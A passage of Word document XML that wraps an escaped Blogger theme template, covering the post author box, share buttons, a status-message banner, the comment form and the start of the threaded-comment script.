        <w:t xml:space="preserve">                                                    &lt;img class='avatar avatar-100 photo' expr:alt='data:post.author' expr:src='data:post.authorPhoto.url' height='100' width='100'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;div class='author-content'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;div class='top-author'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;h5&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;a expr:href='data:post.authorUrl' expr:title='&amp;quot;Posts by &amp;quot; + data:post.author' rel='author'&gt;&lt;data:post.author/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/h5&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;p&gt;&lt;span id='melesa-author-post-desc-place'&gt;&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      /*&lt;![CDATA[*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      $(document).ready(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        $('#melesa-author-post-desc-place').html($('#melesa-post-auth-desc').html());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      });/*]]&gt;*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/script&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;div class='content-social-author' id='mlsa-link-place'&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                      &lt;script&gt;/*&lt;![CDATA[*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        $(document).ready(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          $('#mlsa-link-place').html($('#melesa-author-links').html());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        });/*]]&gt;*/&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;article expr:class='&amp;quot;post hidden ajax_pickup hentry post_&amp;quot; + data:post.id' expr:data-class='&amp;quot;post_&amp;quot; + data:post.id'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='snippet entry-content' itemprop='articleBody'&gt;&lt;data:post.snippet/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='title entry-title'&gt;&lt;data:post.title/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='time published' expr:title='data:post.timestampISO8601'&gt;&lt;data:post.timestampISO8601/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='image'&gt;&lt;b:if cond='data:post.firstImageUrl'&gt;&lt;data:post.firstImageUrl/&gt;&lt;b:else/&gt;https://3.bp.blogspot.com/-a_5Ym6isv1s/Wa6y34E1qRI/AAAAAAAAAcc/mqp3av92yOkJz2OxtLHY_-Xp-m6EICahgCLcBGAs/s1600/nf.jpg&lt;/b:if&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='postauthor'&gt;&lt;data:post.author/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='authorimg'&gt;&lt;data:post.authorPhoto.url/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='purl'&gt;&lt;data:post.url/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='comment'&gt;&lt;data:post.numComments/&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='vcard'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;a class='url fn' expr:href='data:post.authorProfileUrl'&gt;&lt;data:post.author/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &amp;lt;script&amp;gt; post(&amp;#39;.post_&lt;data:post.id/&gt;&amp;#39;,postlayout); &amp;lt;/script&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='postQuickEdit' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:post.editUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;span expr:class='&amp;quot;item-control &amp;quot; + data:post.adminClass'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a expr:href='data:post.editUrl' expr:title='data:top.editPostMsg'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='shareButtons' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:top.showEmailButton'&gt;&lt;a class='goog-inline-block share-button sb-email' expr:href='data:post.sharePostUrl + &amp;quot;&amp;amp;target=email&amp;quot;' expr:title='data:top.emailThisMsg' target='_blank'&gt;&lt;span class='share-button-link-text'&gt;&lt;data:top.emailThisMsg/&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b:if&gt;&lt;b:if cond='data:top.showBlogThisButton'&gt;&lt;a class='goog-inline-block share-button sb-blog' expr:href='data:post.sharePostUrl + &amp;quot;&amp;amp;target=blog&amp;quot;' expr:onclick='&amp;quot;window.open(this.href, \&amp;quot;_blank\&amp;quot;, \&amp;quot;height=270,width=475\&amp;quot;); return false;&amp;quot;' expr:title='data:top.blogThisMsg' target='_blank'&gt;&lt;span class='share-button-link-text'&gt;&lt;data:top.blogThisMsg/&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b:if&gt;&lt;b:if cond='data:top.showTwitterButton'&gt;&lt;a class='goog-inline-block share-button sb-twitter' expr:href='data:post.sharePostUrl + &amp;quot;&amp;amp;target=twitter&amp;quot;' expr:title='data:top.shareToTwitterMsg' target='_blank'&gt;&lt;span class='share-button-link-text'&gt;&lt;data:top.shareToTwitterMsg/&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b:if&gt;&lt;b:if cond='data:top.showFacebookButton'&gt;&lt;a class='goog-inline-block share-button sb-facebook' expr:href='data:post.sharePostUrl + &amp;quot;&amp;amp;target=facebook&amp;quot;' expr:onclick='&amp;quot;window.open(this.href, \&amp;quot;_blank\&amp;quot;, \&amp;quot;height=430,width=640\&amp;quot;); return false;&amp;quot;' </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>expr:title='data:top.shareToFacebookMsg' target='_blank'&gt;&lt;span class='share-button-link-text'&gt;&lt;data:top.shareToFacebookMsg/&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b:if&gt;&lt;b:if cond='data:top.showPinterestButton'&gt;&lt;a class='goog-inline-block share-button sb-pinterest' expr:href='data:post.sharePostUrl + &amp;quot;&amp;amp;target=pinterest&amp;quot;' expr:title='data:top.shareToPinterestMsg' target='_blank'&gt;&lt;span class='share-button-link-text'&gt;&lt;data:top.shareToPinterestMsg/&gt;&lt;/span&gt;&lt;/a&gt;&lt;/b:if&gt;&lt;b:if cond='data:top.showPlusOne'&gt;&lt;div class='goog-inline-block google-plus-share-container'&gt;&lt;data:post.googlePlusShareTag/&gt;&lt;/div&gt;&lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='status-message'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:navMessage'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              $=jQuery;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var msg = &amp;#39;&lt;data:navMessage/&gt;&amp;#39;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              if(implied){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                var c = '&lt;div class=\"top-ban\"&gt;&lt;div class=\"wrapper\"&gt;&lt;div class="container"&gt;&lt;h2&gt;'+ msg +'&lt;/h2&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                $('.content-inner header').after(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                implied = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='threaded-comment-form' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='comment-form'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                            &lt;a name='comment-form'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:mobile'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;p&gt;&lt;data:blogCommentMessage/&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;data:blogTeamBlogMessage/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' style='display: none' width='100%'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;p&gt;&lt;data:blogCommentMessage/&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;data:blogTeamBlogMessage/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a expr:href='data:post.commentFormIframeSrc' id='comment-editor-src'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;iframe allowtransparency='true' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;data:post.cmtfpIframe/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;script type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              BLOG_CMT_createIframe(&amp;#39;&lt;data:post.appRpcRelayPath/&gt;&amp;#39;);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='threaded_comment_js' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;script async='async' expr:src='data:post.commentSrc' type='text/javascript'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;script type='text/javascript'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            (function() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                              var items = &lt;data:post.commentJso/&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var msgs = &lt;data:post.commentMsgs/&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var config = &lt;data:post.commentConfig/&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              // &lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var cursor = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              if (items &amp;&amp; items.length &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                cursor = parseInt(items[items.length - 1].timestamp) + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var bodyFromEntry = function(entry) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                if (entry.gd$extendedProperty) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  for (var k in entry.gd$extendedProperty) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    if (entry.gd$extendedProperty[k].name == 'blogger.contentRemoved') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      return '&lt;span class="deleted-comment"&gt;' + entry.content.$t + '&lt;/span&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                return entry.content.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              var parse = function(data) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                cursor = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                var comments = [];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                if (data &amp;&amp; data.feed &amp;&amp; data.feed.entry) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  for (var i = 0, entry; entry = data.feed.entry[i]; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    var comment = {};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    // comment ID, parsed out of the original id format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
